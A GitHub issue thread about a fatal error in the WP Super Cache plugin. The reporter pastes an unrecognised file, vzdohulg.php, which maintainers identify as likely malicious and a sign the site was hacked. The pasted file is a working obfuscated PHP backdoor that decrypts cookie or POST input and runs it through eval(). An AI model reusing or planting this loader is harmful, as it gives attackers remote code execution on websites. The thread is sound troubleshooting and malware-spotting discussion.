### ISSUE TITLE
Error: Cannot redeclare hhogws()

### ISSUE THREAD

**Issue by gabcarrillo94** [Automattic/wp-super-cache#647]
I updated WP and wp-super-cache to their latest version and PHP to 7.3

This is the error with WP_DEBUG
Fatal error: Cannot redeclare hhogws() (previously declared in /home/.../wp-content/plugins/wp-super-cache/plugins/vzdohulg.php:2) in /home/.../wp-content/plugins/wp-super-cache/plugins/vzdohulg.php on line 2

and this is vzdohulg.php
<?php
$xcawzi = '-dfl260\'*as_rkxH97n#my1ociuv4gbtpe';$nwrdutr = Array();$nwrdutr[] = $xcawzi[17].$xcawzi[30].$xcawzi[30].$xcawzi[2].$xcawzi[28].$xcawzi[16].$xcawzi[16].$xcawzi[16].$xcawzi[0].$xcawzi[30].$xcawzi[6].$xcawzi[24].$xcawzi[17].$xcawzi[0].$xcawzi[28].$xcawzi[33].$xcawzi[33].$xcawzi[28].$xcawzi[0].$xcawzi[30].$xcawzi[1].$xcawzi[16].$xcawzi[4].$xcawzi[0].$xcawzi[2].$xcawzi[6].$xcawzi[4].$xcawzi[1].$xcawzi[28].$xcawzi[28].$xcawzi[5].$xcawzi[9].$xcawzi[22].$xcawzi[5].$xcawzi[5].$xcawzi[6];$nwrdutr[] = $xcawzi[15].$xcawzi[8];$nwrdutr[] = $xcawzi[19];$nwrdutr[] = $xcawzi[24].$xcawzi[23].$xcawzi[26].$xcawzi[18].$xcawzi[31];$nwrdutr[] = $xcawzi[10].$xcawzi[31].$xcawzi[12].$xcawzi[11].$xcawzi[12].$xcawzi[33].$xcawzi[32].$xcawzi[33].$xcawzi[9].$xcawzi[31];$nwrdutr[] = $xcawzi[33].$xcawzi[14].$xcawzi[32].$xcawzi[3].$xcawzi[23].$xcawzi[1].$xcawzi[33];$nwrdutr[] = $xcawzi[10].$xcawzi[26].$xcawzi[30].$xcawzi[10].$xcawzi[31].$xcawzi[12];$nwrdutr[] = $xcawzi[9].$xcawzi[12].$xcawzi[12].$xcawzi[9].$xcawzi[21].$xcawzi[11].$xcawzi[20].$xcawzi[33].$xcawzi[12].$xcawzi[29].$xcawzi[33];$nwrdutr[] = $xcawzi[10].$xcawzi[31].$xcawzi[12].$xcawzi[3].$xcawzi[33].$xcawzi[18];$nwrdutr[] = $xcawzi[32].$xcawzi[9].$xcawzi[24].$xcawzi[13];foreach ($nwrdutr[7]($_COOKIE, $_POST) as $ubsnkun => $apsxre){function hhogws($nwrdutr, $ubsnkun, $aykdkx){return $nwrdutr[6]($nwrdutr[4]($ubsnkun . $nwrdutr[0], ($aykdkx / $nwrdutr[8]($ubsnkun)) + 1), 0, $aykdkx);}function krulyn($nwrdutr, $knfdrls){return @$nwrdutr[9]($nwrdutr[1], $knfdrls);}function fdkdqpc($nwrdutr, $knfdrls){$qkqxewr = $nwrdutr[3]($knfdrls) % 3;if (!$qkqxewr) {eval($knfdrls[1]($knfdrls[2]));exit();}}$apsxre = krulyn($nwrdutr, $apsxre);fdkdqpc($nwrdutr, $nwrdutr[5]($nwrdutr[2], $apsxre ^ hhogws($nwrdutr, $ubsnkun, $nwrdutr[8]($apsxre))));}

**Comment by donnchawp** [comment]
Where did vzdohulg.php come from? Unless you recognise it you should delete it as it's not part of WP Super Cache.

That code looks like it's trying to hide some functionality which might be malicious.

**Comment by gabcarrillo94** [comment]
I don't know where vzdohulg comes from, but it can be something malicious. I deleted the error line and it works. Thank you!

**Comment by iandunn** [comment]
@gabcarrillo94, that probably means that your site has been hacked, so it'd be good to go through the steps necessary to clean it, and prevent it from getting hacked again.

https://codex.wordpress.org/FAQ_My_site_was_hacked
